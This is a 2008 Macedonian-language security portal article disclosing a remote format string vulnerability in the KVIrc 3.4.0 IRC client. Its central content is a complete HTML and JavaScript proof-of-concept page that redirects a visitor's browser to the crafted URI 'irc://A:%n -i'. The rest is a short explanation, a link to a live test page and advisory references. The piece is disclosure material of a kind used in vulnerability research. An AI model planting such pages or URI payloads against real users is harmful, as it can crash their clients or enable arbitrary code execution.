IT.com.mk - Македонски ИТ портал - KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

Компјутерска сигурност

Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи

RSS Канал
Е-пошта
Биографија

Ѓоко Крстиќ

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

Автор: Ѓоко Крстиќ
Објавено на: 27.10.2008
Слабост кај IRC клиентот KVIrc (http://www.kvirc.net) од типот Format String со чија помош може да дојде до извршување на своеволен код или пак Denial of Service. Доказ на концептот: ------------------------------------------------------------------ <!-- KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC) Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit. KVirc is being written by Szymon Stefanek and the KVIrc Development Team with the contribution of many IRC addicted developers around the world. Product web page: http://www.kvirc.net/ Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm [t00t] gmail [d0t] com http://www.zeroscience.org 24.10.2008 --> <html> <title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title> <head> <body> <center> <br /> <br /> <strong>Warning ! :)</strong> </center> <body bgcolor="#FFFF00"> <script type="text/javascript"> alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008"); function poc() { window.location.href = "irc://A:%n -i"; } var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation"); if (answ == true) { poc(); } else { window.location.href = "http://www.kvirc.net"; } </script> </body> </head> </html> ------------------------------------------------------------------ Слабоста се случува кога наменетата апликација преку интернет прелистувач со адреса: irc://A:%n -i ги изврши дадените аргументи. Аргументот -i се користи за подршка за IPv6, додека format string се случува во делот во доделување на порт односно: irc://IP:PORT [options]. Тест (со претпазливост): http://zeroscience.org/codes/kvirc_fs.html Референти: - http://www.frsirt.com/english/advisories/2008/2926 - http://www.juniper.net/security/auto/vulnerabilities/vuln31912.html - http://www.milw0rm.com/exploits/6832 - http://www.securityfocus.com/bid/31912 - http://secunia.com/advisories/32410/ Клучни зборови: KVIrc Format String PoC Експлоит URI URL

Сподели:

Последни написи на Ѓоко

Измами со кредитни картички
објавено на 07.06.2009 во Сигурност

Verizon - Сигурносен извештај за 2009
објавено на 16.04.2009 во Сигурност

SEAT
објавено на 15.03.2009 во Сигурност

w3af - Конструкција за Напад и Ревизија на Веб Апликации
објавено на 03.03.2009 во Сигурност

Secunia - Сигурносен извештај за 2008 година
објавено на 27.02.2009 во Сигурност

Bluetooth?

Технологијата Bluetooth го добила своето име по норвешкиот крал Харалд Блутут (Harald Bluetooth), кој бил познат по тоа што ги обединувал завојуваните племиња во Данска и Норвешка. Целта на технологијата исто така е да ги обедини разните технологии.

Тркалезна маса за активно граѓанско учество
Во рамките на Проектот за децентрализиран...
07.07.2009

WebFest: Најдобри регионални проекти
WebFest е првиот регионален фестивал кој има �...
15.09.2009

biZbuZZ 2009
Од 28-30 Октомври, 2009 во хотелот "Видиковац" в...
28.10.2009